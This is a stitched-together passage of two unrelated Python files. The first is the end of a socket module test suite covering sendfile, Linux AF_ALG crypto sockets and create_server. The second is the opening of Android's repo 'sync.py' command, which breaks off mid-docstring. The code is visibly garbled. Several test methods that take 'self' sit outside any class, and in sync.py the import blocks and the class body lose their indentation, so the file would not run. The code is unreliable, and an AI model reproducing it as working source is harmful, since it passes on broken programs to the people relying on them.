            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)

    @unittest.skipIf(sys.platform == "darwin", "TODO: RUSTPYTHON, killed (for OOM?)")
    def testWithTimeout(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # timeout (triggered)
    def _testWithTimeoutTriggeredSend(self):
        # A 10ms timeout against a server that reads almost nothing must
        # surface as socket.timeout.
        address = self.serv.getsockname()
        with open(support.TESTFN, 'rb') as file:
            with socket.create_connection(address) as sock:
                sock.settimeout(0.01)
                meth = self.meth_from_sock(sock)
                self.assertRaises(socket.timeout, meth, file)

    def testWithTimeoutTriggeredSend(self):
        conn = self.accept_conn()
        conn.recv(88192)

    # errors
    def _test_errors(self):
        pass

    def test_errors(self):
        # Argument validation: wrong socket type, text-mode file, and
        # invalid count values.
        with open(support.TESTFN, 'rb') as file:
            with socket.socket(type=socket.SOCK_DGRAM) as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "SOCK_STREAM", meth, file)
        with open(support.TESTFN, 'rt') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "binary mode", meth, file)
        with open(support.TESTFN, 'rb') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count='2')
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count=0.1)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=0)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
                     'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
    """
    Test the sendfile() implementation of socket.sendfile().
    """
    def meth_from_sock(self, sock):
        # Re-run the whole SendfileUsingSendTest suite against the
        # os.sendfile()-based code path.
        return sock._sendfile_use_sendfile
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
    def create_alg(self, typ, name):
        """Return an AF_ALG socket bound to the (typ, name) algorithm.

        Skips the running test when the kernel does not provide the
        requested algorithm (bind raises FileNotFoundError).
        """
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        try:
            sock.bind((typ, name))
        except FileNotFoundError as e:
            # type / algorithm is not available
            sock.close()
            raise unittest.SkipTest(str(e), typ, name)
        else:
            return sock
    # bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
    # at least on ppc64le architecture
    @support.requires_linux_version(4, 5)
    def test_sha256(self):
        # Known SHA-256 digest of b"abc".
        expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
                                 "177a9cb410ff61f20015ad")
        with self.create_alg('hash', 'sha256') as algo:
            op, _ = algo.accept()
            with op:
                op.sendall(b"abc")
                self.assertEqual(op.recv(512), expected)

            op, _ = algo.accept()
            with op:
                # Same digest fed one byte at a time using MSG_MORE,
                # finished by an empty send.
                op.send(b'a', socket.MSG_MORE)
                op.send(b'b', socket.MSG_MORE)
                op.send(b'c', socket.MSG_MORE)
                op.send(b'')
                self.assertEqual(op.recv(512), expected)
    def test_hmac_sha1(self):
        # HMAC-SHA1 with key b"Jefe" over the RFC 2202 test message.
        expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
        with self.create_alg('hash', 'hmac(sha1)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
            op, _ = algo.accept()
            with op:
                op.sendall(b"what do ya want for nothing?")
                self.assertEqual(op.recv(512), expected)
    # Although it should work with 3.19 and newer the test blocks on
    # Ubuntu 15.10 with Kernel 4.2.0-19.
    @support.requires_linux_version(4, 3)
    def test_aes_cbc(self):
        key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
        iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
        msg = b"Single block msg"
        ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
        msglen = len(msg)
        with self.create_alg('skcipher', 'cbc(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            op, _ = algo.accept()
            with op:
                # Encrypt: send op/iv control data first (MSG_MORE), then
                # the plaintext.
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 flags=socket.MSG_MORE)
                op.sendall(msg)
                self.assertEqual(op.recv(msglen), ciphertext)

            op, _ = algo.accept()
            with op:
                # Decrypt back to the original plaintext.
                op.sendmsg_afalg([ciphertext],
                                 op=socket.ALG_OP_DECRYPT, iv=iv)
                self.assertEqual(op.recv(msglen), msg)

            # long message
            multiplier = 1024
            longmsg = [msg] * multiplier
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(longmsg,
                                 op=socket.ALG_OP_ENCRYPT, iv=iv)
                enc = op.recv(msglen * multiplier)
            self.assertEqual(len(enc), msglen * multiplier)
            # First block matches the single-block vector (CBC with the
            # same IV and plaintext).
            self.assertEqual(enc[:msglen], ciphertext)

            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg([enc],
                                 op=socket.ALG_OP_DECRYPT, iv=iv)
                dec = op.recv(msglen * multiplier)
            self.assertEqual(len(dec), msglen * multiplier)
            self.assertEqual(dec, msg * multiplier)
    @support.requires_linux_version(4, 9)  # see issue29324
    def test_aead_aes_gcm(self):
        # AES-GCM AEAD round trips, exercising both the sendmsg_afalg()
        # convenience API and hand-built ancillary data.
        key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
        iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
        plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
        assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
        expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
        expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')

        taglen = len(expected_tag)
        assoclen = len(assoc)

        with self.create_alg('aead', 'gcm(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
                            None, taglen)

            # send assoc, plain and tag buffer in separate steps
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen, flags=socket.MSG_MORE)
                op.sendall(assoc, socket.MSG_MORE)
                op.sendall(plain)
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # now with msg
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # create anc data manually
            pack_uint32 = struct.Struct('I').pack
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg(
                    [msg],
                    ([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
                     [socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
                     [socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
                    )
                )
                res = op.recv(len(msg) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # decrypt and verify
            op, _ = algo.accept()
            with op:
                msg = assoc + expected_ct + expected_tag
                op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(len(msg) - taglen)
                self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3)  # see test_aes_cbc
def test_drbg_pr_sha256(self):
    """Read random bytes from a kernel DRBG exposed as an AF_ALG 'rng'."""
    # deterministic random bit generator, prediction resistance, sha256
    with self.create_alg('rng', 'drbg_pr_sha256') as algo:
        # ALG_SET_KEY provides additional seed material to the RNG.
        extra_seed = os.urandom(32)
        algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
        op, _ = algo.accept()
        with op:
            rn = op.recv(32)
            # Output is random, so only its length can be asserted.
            self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
    """sendmsg_afalg() must reject bad op/assoclen arguments with TypeError."""
    with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as sock:
        bad_calls = [
            ((), {}),                       # no arguments at all
            ((), {'op': None}),             # op is not an integer
            ((1,), {}),                     # non-buffer positional msg
            ((), {'op': socket.ALG_OP_ENCRYPT, 'assoclen': None}),
            ((), {'op': socket.ALG_OP_ENCRYPT, 'assoclen': -1}),
        ]
        for call_args, call_kwargs in bad_calls:
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(*call_args, **call_kwargs)
def test_length_restriction(self):
    """AF_ALG bind() must enforce the salg_type/salg_name buffer sizes."""
    # bpo-35050, off-by-one error in length check
    sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    self.addCleanup(sock.close)

    # salg_type[14]
    # 13 chars fit (14-byte buffer incl. NUL): the address is accepted and
    # presumably reaches the kernel, which rejects the unknown algorithm
    # type with FileNotFoundError; 14 chars must fail the length check.
    with self.assertRaises(FileNotFoundError):
        sock.bind(("t" * 13, "name"))
    with self.assertRaisesRegex(ValueError, "type too long"):
        sock.bind(("t" * 14, "name"))

    # salg_name[64]
    # Same pattern: 63 chars fit, 64 chars must be rejected by Python.
    with self.assertRaises(FileNotFoundError):
        sock.bind(("type", "n" * 63))
    with self.assertRaisesRegex(ValueError, "name too long"):
        sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
    """Guard against new, unreviewed TCP_* constants appearing on Windows."""

    # TCP options already reviewed, grouped by the Windows release that
    # introduced them:
    #   long-standing:      TCP_MAXSEG, TCP_NODELAY
    #   Windows 10 1607:    TCP_FASTOPEN
    #   Windows 10 1703:    TCP_KEEPCNT
    #   Windows 10 1709:    TCP_KEEPIDLE, TCP_KEEPINTVL
    knownTCPFlags = {
        'TCP_MAXSEG',
        'TCP_NODELAY',
        'TCP_FASTOPEN',
        'TCP_KEEPCNT',
        'TCP_KEEPIDLE',
        'TCP_KEEPINTVL',
    }

    def test_new_tcp_flags(self):
        """Fail if the socket module exposes a TCP_* name not listed above."""
        unknown = [name for name in dir(socket)
                   if name.startswith('TCP') and name not in self.knownTCPFlags]
        self.assertEqual([], unknown,
                         "New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
    """Tests for socket.create_server()."""

    def test_address(self):
        """The returned socket is bound to the requested host and port."""
        port = support.find_unused_port()
        with socket.create_server(("127.0.0.1", port)) as sock:
            self.assertEqual(sock.getsockname()[0], "127.0.0.1")
            self.assertEqual(sock.getsockname()[1], port)
        if support.IPV6_ENABLED:
            with socket.create_server(("::1", port),
                                      family=socket.AF_INET6) as sock:
                self.assertEqual(sock.getsockname()[0], "::1")
                self.assertEqual(sock.getsockname()[1], port)

    def test_family_and_type(self):
        """The family matches the request; the type is always SOCK_STREAM."""
        with socket.create_server(("127.0.0.1", 0)) as sock:
            self.assertEqual(sock.family, socket.AF_INET)
            self.assertEqual(sock.type, socket.SOCK_STREAM)
        if support.IPV6_ENABLED:
            with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
                self.assertEqual(s.family, socket.AF_INET6)
                # BUG FIX: this previously asserted `sock.type` — the
                # already-closed IPv4 socket from the first block — instead
                # of the IPv6 socket `s` under test.
                self.assertEqual(s.type, socket.SOCK_STREAM)

    def test_reuse_port(self):
        """reuse_port=True sets SO_REUSEPORT; default leaves it unset."""
        if not hasattr(socket, "SO_REUSEPORT"):
            # Platforms without SO_REUSEPORT must reject the option.
            with self.assertRaises(ValueError):
                socket.create_server(("localhost", 0), reuse_port=True)
        else:
            with socket.create_server(("localhost", 0)) as sock:
                opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
                self.assertEqual(opt, 0)
            with socket.create_server(("localhost", 0), reuse_port=True) as sock:
                opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
                self.assertNotEqual(opt, 0)

    @unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
                     not hasattr(_socket, 'IPV6_V6ONLY'),
                     "IPV6_V6ONLY option not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_ipv6_only_default(self):
        """Without dualstack, an AF_INET6 server socket is v6-only."""
        with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
            assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dualstack_ipv6_family(self):
        """A dualstack server socket still reports family AF_INET6."""
        with socket.create_server(("::1", 0), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
    """End-to-end echo tests for sockets created with socket.create_server()."""

    # Upper bound (seconds) for socket operations and thread join.
    timeout = 3

    def setUp(self):
        self.thread = None

    def tearDown(self):
        # Make sure the server thread from echo_server() has finished.
        if self.thread is not None:
            self.thread.join(self.timeout)

    def echo_server(self, sock):
        """Start a background thread that accepts one client and echoes once."""
        def run(sock):
            with sock:
                conn, _ = sock.accept()
                with conn:
                    # `event` is resolved from the enclosing scope; it is
                    # created below, before the thread starts.
                    event.wait(self.timeout)
                    msg = conn.recv(1024)
                    if not msg:
                        return
                    conn.sendall(msg)

        event = threading.Event()
        sock.settimeout(self.timeout)
        self.thread = threading.Thread(target=run, args=(sock, ))
        self.thread.start()
        event.set()

    def echo_client(self, addr, family):
        """Connect to addr, send b'foo' and assert it is echoed back."""
        with socket.socket(family=family) as sock:
            sock.settimeout(self.timeout)
            sock.connect(addr)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')

    def test_tcp4(self):
        port = support.find_unused_port()
        with socket.create_server(("", port)) as sock:
            self.echo_server(sock)
            self.echo_client(("127.0.0.1", port), socket.AF_INET)

    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_tcp6(self):
        port = support.find_unused_port()
        with socket.create_server(("", port),
                                  family=socket.AF_INET6) as sock:
            self.echo_server(sock)
            self.echo_client(("::1", port), socket.AF_INET6)

    # --- dual stack tests

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dual_stack_client_v4(self):
        # An IPv4 client must be able to reach a dualstack AF_INET6 server.
        port = support.find_unused_port()
        with socket.create_server(("", port), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.echo_server(sock)
            self.echo_client(("127.0.0.1", port), socket.AF_INET)

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dual_stack_client_v6(self):
        # An IPv6 client must also work against the same dualstack server.
        port = support.find_unused_port()
        with socket.create_server(("", port), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.echo_server(sock)
            self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
    """Collect every test case class in this module and run them."""
    tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
             TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
             UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]

    tests.extend([
        NonBlockingTCPTests,
        FileObjectClassTestCase,
        UnbufferedFileObjectClassTestCase,
        LineBufferedFileObjectClassTestCase,
        SmallBufferedFileObjectClassTestCase,
        UnicodeReadFileObjectClassTestCase,
        UnicodeWriteFileObjectClassTestCase,
        UnicodeReadWriteFileObjectClassTestCase,
        NetworkConnectionNoServer,
        NetworkConnectionAttributesTest,
        NetworkConnectionBehaviourTest,
        ContextManagersTest,
        InheritanceTest,
        NonblockConstantTest
    ])
    # Platform/feature specific suites (Unix sockets, CAN, RDS, TIPC, ...).
    tests.append(BasicSocketPairTest)
    tests.append(TestUnixDomain)
    tests.append(TestLinuxAbstractNamespace)
    tests.extend([TIPCTest, TIPCThreadableTest])
    tests.extend([BasicCANTest, CANTest])
    tests.extend([BasicRDSTest, RDSTest])
    tests.append(LinuxKernelCryptoAPI)
    tests.append(BasicQIPCRTRTest)
    tests.extend([
        BasicVSOCKTest,
        ThreadedVSOCKSocketStreamTest,
    ])
    tests.extend([
        CmsgMacroTests,
        SendmsgUDPTest,
        RecvmsgUDPTest,
        RecvmsgIntoUDPTest,
        SendmsgUDP6Test,
        RecvmsgUDP6Test,
        RecvmsgRFC3542AncillaryUDP6Test,
        RecvmsgIntoRFC3542AncillaryUDP6Test,
        RecvmsgIntoUDP6Test,
        SendmsgTCPTest,
        RecvmsgTCPTest,
        RecvmsgIntoTCPTest,
        SendmsgSCTPStreamTest,
        RecvmsgSCTPStreamTest,
        RecvmsgIntoSCTPStreamTest,
        SendmsgUnixStreamTest,
        RecvmsgUnixStreamTest,
        RecvmsgIntoUnixStreamTest,
        RecvmsgSCMRightsStreamTest,
        RecvmsgIntoSCMRightsStreamTest,
        # These are slow when setitimer() is not available
        InterruptedRecvTimeoutTest,
        InterruptedSendTimeoutTest,
        TestSocketSharing,
        SendfileUsingSendTest,
        SendfileUsingSendfileTest,
    ])
    tests.append(TestMSWindowsTCPFlags)

    # Snapshot thread state so leaked threads can be flagged after the run.
    thread_info = support.threading_setup()
    support.run_unittest(*tests)
    support.threading_cleanup(*thread_info)


if __name__ == "__main__":
    test_main()
|
sync.py | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.cookiejar as cookielib
import json
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import git_superproject
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
# Number of seconds in one day.
_ONE_DAY_S = 24 * 60 * 60


class _FetchError(Exception):
  """Internal error thrown in _FetchHelper() when we don't want stack trace."""


class _CheckoutError(Exception):
  """Internal error thrown in _CheckoutOne() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
PARALLEL_JOBS = 1
def _Options(self, p, show_smart=True):
  """Register `repo sync` command line options on parser *p*.

  Args:
    p: optparse.OptionParser to add the options to.
    show_smart: Whether to expose the -s/--smart-sync and -t/--smart-tag
        options.
  """
  try:
    # Honor the manifest's default sync-j setting when present.
    self.PARALLEL_JOBS = self.manifest.default.sync_j
  except ManifestParseError:
    pass
  super()._Options(p)

  p.add_option('-f', '--force-broken',
               dest='force_broken', action='store_true',
               help='obsolete option (to be deleted in the future)')
  p.add_option('--fail-fast',
               dest='fail_fast', action='store_true',
               help='stop syncing after first error is hit')
  p.add_option('--force-sync',
               dest='force_sync', action='store_true',
               help="overwrite an existing git directory if it needs to "
                    "point to a different object directory. WARNING: this "
                    "may cause loss of data")
  p.add_option('--force-remove-dirty',
               dest='force_remove_dirty', action='store_true',
               help="force remove projects with uncommitted modifications if "
                    "projects no longer exist in the manifest. "
                    "WARNING: this may cause loss of data")
  p.add_option('-l', '--local-only',
               dest='local_only', action='store_true',
               help="only update working tree, don't fetch")
  # BUG FIX: default was the string 'true' (truthy by accident); use the
  # boolean True so store_false has a proper counterpart.
  p.add_option('--no-manifest-update', '--nmu',
               dest='mp_update', action='store_false', default=True,
               help='use the existing manifest checkout as-is. '
                    '(do not update to the latest revision)')
  p.add_option('-n', '--network-only',
               dest='network_only', action='store_true',
               help="fetch only, don't update working tree")
  p.add_option('-d', '--detach',
               dest='detach_head', action='store_true',
               help='detach projects back to manifest revision')
  p.add_option('-c', '--current-branch',
               dest='current_branch_only', action='store_true',
               help='fetch only current branch from server')
  # -v and -q share one dest: verbose -> True, quiet -> False.
  p.add_option('-v', '--verbose',
               dest='output_mode', action='store_true',
               help='show all sync output')
  p.add_option('-q', '--quiet',
               dest='output_mode', action='store_false',
               help='only show errors')
  p.add_option('-m', '--manifest-name',
               dest='manifest_name',
               help='temporary manifest to use for this sync', metavar='NAME.xml')
  p.add_option('--clone-bundle', action='store_true',
               help='enable use of /clone.bundle on HTTP/HTTPS')
  p.add_option('--no-clone-bundle', dest='clone_bundle', action='store_false',
               help='disable use of /clone.bundle on HTTP/HTTPS')
  p.add_option('-u', '--manifest-server-username', action='store',
               dest='manifest_server_username',
               help='username to authenticate with the manifest server')
  p.add_option('-p', '--manifest-server-password', action='store',
               dest='manifest_server_password',
               help='password to authenticate with the manifest server')
  p.add_option('--fetch-submodules',
               dest='fetch_submodules', action='store_true',
               help='fetch submodules from server')
  p.add_option('--use-superproject', action='store_true',
               help='use the manifest superproject to sync projects')
  p.add_option('--no-tags',
               dest='tags', default=True, action='store_false',
               help="don't fetch tags")
  p.add_option('--optimized-fetch',
               dest='optimized_fetch', action='store_true',
               help='only fetch projects fixed to sha1 if revision does not exist locally')
  p.add_option('--retry-fetches',
               default=0, action='store', type='int',
               help='number of times to retry fetches on transient errors')
  p.add_option('--prune', dest='prune', action='store_true',
               help='delete refs that no longer exist on the remote')
  if show_smart:
    p.add_option('-s', '--smart-sync',
                 dest='smart_sync', action='store_true',
                 help='smart sync using manifest from the latest known good build')
    p.add_option('-t', '--smart-tag',
                 dest='smart_tag', action='store',
                 help='smart sync using manifest from a known tag')

  g = p.add_option_group('repo Version options')
  g.add_option('--no-repo-verify',
               dest='repo_verify', default=True, action='store_false',
               help='do not verify repo source code')
  g.add_option('--repo-upgraded',
               dest='repo_upgraded', action='store_true',
               help=SUPPRESS_HELP)
def _GetBranch(self):
  """Return the branch name used when requesting an approved manifest."""
  mp = self.manifest.manifestProject
  branch = mp.GetBranch(mp.CurrentBranch).merge
  # Strip the refs/heads/ prefix so only the short branch name remains.
  return branch[len(R_HEADS):] if branch.startswith(R_HEADS) else branch
def _UpdateProjectsRevisionId(self, opt, args):
  """Update revisionId of every project with the SHA from superproject.

  This function updates each project's revisionId with SHA from superproject.
  It writes the updated manifest into a file and reloads the manifest from it.
  Exits the process with status 1 if the superproject update fails.

  Args:
    opt: Program options returned from optparse.  See _Options().
    args: Arguments to pass to GetProjects. See the GetProjects
        docstring for details.

  Returns:
    Returns path to the overriding manifest file.
  """
  superproject = git_superproject.Superproject(self.manifest,
                                               self.repodir)
  all_projects = self.GetProjects(args,
                                  missing_ok=True,
                                  submodules_ok=opt.fetch_submodules)
  manifest_path = superproject.UpdateProjectsRevisionId(all_projects)
  if not manifest_path:
    # BUG FIX: error message previously misspelled 'revisionId' as 'revsionId'.
    print('error: Update of revisionId from superproject has failed',
          file=sys.stderr)
    sys.exit(1)
  self._ReloadManifest(manifest_path)
  return manifest_path
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
  """Worker entry point: fetch a list of projects sharing an objdir.

  Runs _FetchHelper() for each project in turn, stopping early at the
  first failure when --fail-fast was requested.  Always releases *sem*
  so the scheduler can start another worker.

  Args:
    opt: Program options returned from optparse.  See _Options().
    projects: Projects to fetch.
    sem: Semaphore released on exit so another thread can be started.
    *args, **kwargs: Remaining arguments forwarded to _FetchHelper().
  """
  try:
    for proj in projects:
      ok = self._FetchHelper(opt, proj, *args, **kwargs)
      if opt.fail_fast and not ok:
        break
  finally:
    sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
                 clone_filter):
  """Fetch git objects for a single project.

  Args:
    opt: Program options returned from optparse.  See _Options().
    project: Project object for the project to fetch.
    lock: Lock for accessing objects that are shared amongst multiple
        _FetchHelper() threads.
    fetched: set object that we will add project.gitdir to when we're done
        (with our lock held).
    pm: Instance of a Project object.  We will call pm.update() (with our
        lock held).
    err_event: We'll set this event in the case of an error (after printing
        out info about the error).
    clone_filter: Filter for use in a partial clone.

  Returns:
    Whether the fetch was successful.
  """
  # We'll set to true once we've locked the lock.
  did_lock = False

  # Encapsulate everything in a try/except/finally so that:
  # - We always set err_event in the case of an exception.
  # - We always make sure we unlock the lock if we locked it.
  start = time.time()
  success = False
  try:
    try:
      success = project.Sync_NetworkHalf(
          quiet=opt.quiet,
          verbose=opt.verbose,
          current_branch_only=opt.current_branch_only,
          force_sync=opt.force_sync,
          clone_bundle=opt.clone_bundle,
          tags=opt.tags, archive=self.manifest.IsArchive,
          optimized_fetch=opt.optimized_fetch,
          retry_fetches=opt.retry_fetches,
          prune=opt.prune,
          clone_filter=clone_filter)
      # Record elapsed time before taking the lock; the network half is done.
      self._fetch_times.Set(project, time.time() - start)

      # Lock around all the rest of the code, since printing, updating a set
      # and Progress.update() are not thread safe.
      lock.acquire()
      did_lock = True

      if not success:
        err_event.set()
        print('error: Cannot fetch %s from %s'
              % (project.name, project.remote.url),
              file=sys.stderr)
        if opt.fail_fast:
          raise _FetchError()

      fetched.add(project.gitdir)
      pm.update(msg=project.name)
    except _FetchError:
      # Already reported above; swallow so the worker exits cleanly.
      pass
    except Exception as e:
      print('error: Cannot fetch %s (%s: %s)'
            % (project.name, type(e).__name__, str(e)), file=sys.stderr)
      err_event.set()
      raise
  finally:
    if did_lock:
      lock.release()
    # Log the sync event even on failure, for later analysis.
    finish = time.time()
    self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
                           start, finish, success)

  return success
def _Fetch(self, projects, opt, err_event):
  """Fetch network objects for *projects*, using up to self.jobs threads.

  Projects that share an object directory are grouped onto the same worker
  so two fetches never write into one objdir concurrently.

  Args:
